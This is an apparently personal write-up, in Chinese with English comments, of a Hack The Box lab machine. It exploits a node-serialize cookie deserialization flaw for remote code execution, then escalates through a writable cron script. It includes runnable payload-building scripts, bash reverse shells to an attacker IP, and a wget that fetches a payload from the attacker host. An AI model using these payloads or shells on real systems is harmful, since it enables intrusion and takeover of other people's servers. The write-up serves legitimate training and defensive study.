- URL : https://app.hackthebox.eu/machines/130
- IP : 10.129.217.35
Recon
- 掃 Port
# Port scan of the target with nmapAutomator (recon profile); the app of interest turns out to be on port 3000 (see the scripts below).
nmapAutomator.sh -H 10.129.217.35 -t recon
- 掃路徑
- 首頁 404
- 發現有餅乾
- F5 後
- 發現餅乾是 Serialize
Serialize
# Probe script: the 'profile' cookie observed in the browser (notes above) is the
# base64 text of a JSON object with username/country/city/num, so a hand-built
# JSON is base64-encoded and sent back to see how the server interprets it.
import requests
import base64
# Baseline object with the same four keys the real cookie carries.
src: bytes = b'{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}'
# Cookie value is the base64 of the raw JSON bytes.
dst: str = base64.b64encode(src).decode('ascii')
cookies: dict[str, str] = {
'profile': dst
}
# Headers copied from a browser capture so the request matches the original one.
headers: dict[str, str] = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
# NOTE(review): this ETag was captured from the browser; if it still matches the
# server's current ETag the reply may be a bodyless 304 — confirm before reading
# anything into an empty print.
'If-None-Match': 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"',
'Cache-Control': 'max-age=0',
}
# The app on port 3000 reads the cookie back; the responses recorded below echo
# username and an arithmetic result derived from num.
response = requests.get('http://10.129.217.35:3000/', headers=headers, cookies=cookies)
print(response.text)
亂戳
{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": true}
會回傳
Hey meow true + true is 2
戳
{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": []}
會回傳
Hey meow + is undefined
戳
eval("A")
會噴錯
錯誤中有提到
SyntaxError: Unexpected token e<br> at Object.parse (native)<br> at Object.exports.unserialize (/home/sun/node_modules/node-serialize/lib/serialize.js
- Google
node-serialize exploit
- https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf
透過 IIFE 來達成 RCE
// Reference PoC from the advisory linked above: node-serialize stores a function's
// source text in the serialized JSON behind a "_$$ND_FUNC$$_" marker (see the output
// line below). That marker is what lets a tampered cookie carry code — the fix on
// the server side is to parse cookies with JSON.parse and validate the fields,
// never with a serializer that can rebuild functions.
var y = {
rce : function(){
require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });
},
}
var serialize = require('node-serialize');
// Only stringifies the object here; the function body is stored as text, not run.
console.log("Serialized: \n" + serialize.serialize(y));
{"rce":"_$$ND_FUNC$$_function(){\n require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n }"}
// Same object shape as the app's profile cookie (username/country/city) plus an
// extra key. NOTE(review): the "()" after the function literal on the rce line
// invokes it while this object literal is being evaluated, so the exec runs at
// definition time on this machine and y.rce holds the call's return value — it is
// not deferred to unserialize(). The final payload below instead appends "()" to
// the already-serialized "_$$ND_FUNC$$_" string, which is the form the advisory
// describes for triggering the call inside unserialize().
var y = {
rce : function(){
require('child_process').exec('id', function(error, stdout, stderr) { console.log(stdout) });}(),
username: "meow" ,
country:"Idk Probably Somewhere Dumb",
city :"Lametown",
// num: 2,
}
var serialize = require('node-serialize');
// console.log("Serialized: \n" + Buffer.from(serialize.serialize(y)).toString('base64'));
var s = serialize.serialize(y);
// console.log(s)
// Local round-trip: the error stack quoted above shows unserialize() goes through
// JSON.parse first, which is why a non-JSON cookie produced a SyntaxError.
serialize.unserialize(s)
- 戳 Reverse shell
# Reverse-shell one-liner used as the command executed on the target: it opens an outbound TCP connection from the target to 10.10.16.35:7877. From the defender's side that egress connection from the web application's process is the observable.
bash -c 'bash -i >& /dev/tcp/10.10.16.35/7877 0>&1'
Exploit
- 完整 Payload
# Full cookie payload with the command literal inline; note the "()" appended after the
# serialized function source. The script below builds the same string from a cmd variable.
src: str = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('wget 10.10.16.35', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
# Templated version of the payload above: the command is spliced into the
# serialized "rce" entry and the whole JSON is base64-encoded into the 'profile'
# cookie that the app hands to node-serialize's unserialize().
import requests
import base64
# Embedded verbatim inside a single-quoted JS string inside the JSON; nothing is
# escaped, so a quote character in cmd breaks the literal.
cmd: str = "wget 10.10.16.35"
# "_$$ND_FUNC$$_" is node-serialize's function marker; per the advisory linked
# above, the "()" after the function source turns the rebuilt function into an
# immediate call during unserialize().
src = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('""" + cmd + """', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
src = src.encode('ascii')
dst: str = base64.b64encode(src).decode('ascii')
cookies: dict[str, str] = {
'profile': dst
}
# Browser-captured headers, same as the earlier probe script.
headers: dict[str, str] = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'If-None-Match': 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"',
'Cache-Control': 'max-age=0',
}
# Defender's view: this works only because the server deserializes an unauthenticated,
# client-controlled cookie. JSON.parse with field validation plus a signed (HMAC) cookie
# removes the issue; a web server process spawning child_process/wget is the detection signal.
response = requests.get('http://10.129.217.35:3000/', headers=headers, cookies=cookies)
print(response.text)
- 就成功 RCE ㄌ
# Command sent through the rce payload (presumably as cmd): fetch the reverse-shell script from the attacker host to /tmp/s.
wget 10.10.16.35/s_HTB -O /tmp/s
- 放 Reverse shell
- 戳回來
提權
# Upgrade the bare reverse shell to a pty-backed interactive bash.
python -c 'import pty; pty.spawn("/bin/bash")'
- 發現家目錄有
output.txt
- 跑豌豆
- 找到一個 Cronjob
- 觀察
output.txt
- 尋找
Script is running 在哪
# Search the whole filesystem for the literal string seen in output.txt to locate the script that writes it; errors (unreadable paths) are discarded.
grep -rnw '/' -e 'Script is running...' 2>/dev/null
- 找到 user flag
- script 是 cron job，每 5 分鐘跑一次，且我們可以修改
- 戳 reverse shell
# Overwrite the cron-run script.py (writable, per the note above) with a Python reverse shell to 10.10.16.35:7878; the cron job picks it up on its next 5-minute run. A world-writable script executed from cron is the root cause here.
echo "import os" > script.py
echo "os.system(\"bash -c 'bash -i >& /dev/tcp/10.10.16.35/7878 0>&1'\")" >> script.py
- 收 Reverse shell